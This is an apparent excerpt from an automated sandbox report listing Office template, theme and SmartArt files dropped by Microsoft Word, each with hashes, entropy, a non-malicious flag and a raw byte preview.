                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.87271654296772
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                                                                                                                                                                                                                                          MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                                                                                                                                                                                                                                          SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):260
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4895685222798054
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3075
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.716021191059687
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                                                                                                                                                                                                                                          MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):562113
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.67409707491542
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                                                                                                                                                                                                                                          MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535736910133401
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):274
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.438490642908344
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                                                                                                                          MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):34415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.352974342178997
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                                                                                                                                                                                                                                          MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1649585
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.875240099125746
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                                                                                                                                                                                                                                          MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5552837910707304
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):570901
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.674434888248144
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                                                                                                                                                                                                                                          MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):282
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5459495297497368
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):523048
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.715248170753013
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                                                                                                                                                                                                                                          MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):276
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5159096381406645
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):558035
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.696653383430889
